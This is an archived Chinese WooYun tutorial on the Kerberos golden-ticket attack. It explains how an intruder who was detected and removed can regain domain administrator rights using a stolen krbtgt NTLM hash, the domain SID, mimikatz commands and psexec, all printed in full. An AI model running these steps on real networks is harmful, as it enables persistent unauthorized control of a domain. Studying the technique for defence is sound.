# 域渗透的金之钥匙

Author: 乌云历史资料库 (@wooyun_archive)
Published: 2015-10-13T03:33:00Z
Canonical: https://wepostx.com/topics/1104

> 乌云历史资料归档
>
> **原始作者：** mickey
> **原始编号：** superkieran-wooyundrops:821
> **原始发布时间：** 2015-10-13 11:33
> **声明：内容仅用于技术研究和个人使用，版权归 wooyun.org。**

---

# 0x00 废话连篇

最近几年很少搞内网渗透了，这几年发展的快啊，看了A牛翻译的<<Fireeye Mandiant 2014 安全报告 Part1>> ，发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的，找朋友要些vbscript脚本自动化，然后那啥那啥的。现在搞域除了前段时间出的MS14068，还有龙哥翻译的（[http://drops.wooyun.org/papers/576](http://drops.wooyun.org/papers/576)）,不知道还有什么新方法，心中还有激情，如果想交流的朋友，可以加我聊聊。

# 0x01 金之钥匙

我原来发过一个微薄说

![原文图片](/media/2016/06/e1ba3b9283e39fbf8a4c2b97d5c2e3d5)

这就是我说的金之钥匙，利用这个的条件是你在原来搞定域控的时候，已经导出过域用户的HASH，尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候，活儿不细，被人家发现了，你拥有的域管理员权限掉了，你现在还有一个普通的域用户权限，管理员做加固的时候又忘记修改krbtgt密码了（很常见），我们还是能重新回来，步骤如下：
要重新拿回域管理员权限，首先要先知道域内的管理员有谁
C:\Users\hydra>net group "domain admins" /domain
我这里的实验环境，通过截图可以看到域管理员是administrator
我还要知道域SID是啥
C:\Users\hydra>whoami /user
我的域SID是 S-1-5-21-3883552807-251258116-2724407435
还有最重要的krbtgt用户的ntlm哈希，我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

![原文图片](/media/2016/06/d755d2546391806c4ed587802d804f76)

然后该用神器mimikatz出场了，依次执行

```text
mimikatz # kerberos::purge mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi mimikatz # kerberos::ptt Administrator.kiribi mimikatz # kerberos::tgt
```

![原文图片](/media/2016/06/fd41e74049e320d918d14e2668a83d5a)

到现在，我们又重新拥有域管理员权限了，可以验证下

```text
E:\>net use \\WIN-0DKN2AS0T2G\c$ E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
```

![原文图片](/media/2016/06/161ed9c0cab1e41590aeeabf0423a05c)

# 0x02 后话闲扯

呃，感觉这个方法比[http://drops.wooyun.org/tips/9297](http://drops.wooyun.org/tips/9297)这个方便些，文章写了好久了，一直凑不出更多的字数，就没发。。嗯。。。懒了。。

## Replies
